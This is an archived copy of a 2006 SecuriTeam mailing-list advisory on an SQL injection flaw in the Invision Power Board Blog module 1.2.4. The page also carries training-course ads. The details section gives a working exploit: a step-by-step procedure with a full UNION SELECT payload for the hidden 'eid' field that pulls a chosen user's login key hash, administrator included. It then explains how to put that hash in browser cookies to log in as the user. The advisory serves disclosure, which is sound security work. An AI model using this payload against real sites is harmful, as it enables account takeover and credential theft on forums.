Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Invision Community Blog Mod 1.2.4 SQL Injection

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Invision Community Blog Mod 1.2.4 SQL Injection
Date: 21 Dec 2006 16:06:28 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Invision Community Blog Mod 1.2.4 SQL Injection
------------------------------------------------------------------------


SUMMARY

 <http://www.invisionboard.com/> Invision Power Board (IPB) is "a 
professional forum system that has been built from the ground up with 
speed and security in mind, taking advantage of object oriented code, 
highly-optimized SQL queries, and the fast PHP engine. A comprehensive 
administration control panel is included to help you keep your board 
running smoothly. Moderators will also enjoy the full range of options 
available to them via built-in tools and moderators control panel. Members 
will appreciate the ability to subscribe to topics, send private messages, 
and perform a host of other options through the user control panel. It is 
used by millions of people over the world"

An SQL injection vulnerability found in Invision Power Board Blog module 
version 1.2.4 allows attackers to run SQL queries and obtain users 
passwords.

DETAILS

Exploit:
1. Open any blog entry
2. Try to reply to any message
3. Push "Preview message" button (Do not post your reply)
4. Save source code of opened page to your PC
5. Find this string <input type='hidden' name='eid' value='BLOG_ENTRY_ID' 
/>

6. Change BLOG_ENTRY_ID with this SQL Injection:
BLOG_ENTRY_ID UNION  SELECT b.entry_id,  b.blog_id, b.category_id, 
b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key, 
b.entry_category, b.entry, b.entry_status, b.entry_locked, 
b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, 
b.entry_last_comment_name, b.entry_last_comment_mid, 
b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, 
b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, 
b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, 
b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM 
ibf_members, ibf_blog_entries b WHERE id=USER_ID and 
b.entry_id=BLOG_ENTRY_ID LIMIT 1,1

USER_ID - ID of the user whom password you want to get (admin user id is 
1).

7. Push "Preview Button" again.
8. After refresh instead of blog entry name you will get users's HASH 
password.
9. Change your cookies in your favorite browser and open board. You will 
be automaticaly logged in as the user whom password you just got.


ADDITIONAL INFORMATION

The original article can be found at:  
<http://www.milw0rm.com/exploits/2877> 
http://www.milw0rm.com/exploits/2877



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Invision Community Blog Mod 1.2.4 SQL Injection, SecuriTeam <=
Previous by Date:  [NEWS] Symantec Veritas NetBackup Long Request Buffer Overflow, SecuriTeam
Next by Date:  [EXPL] Hewlett-Packard FTP Print Server Buffer Overflow (PoC), SecuriTeam
Previous by Thread:  [NEWS] Symantec Veritas NetBackup Long Request Buffer Overflow, SecuriTeam
Next by Thread:  [EXPL] Hewlett-Packard FTP Print Server Buffer Overflow (PoC), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]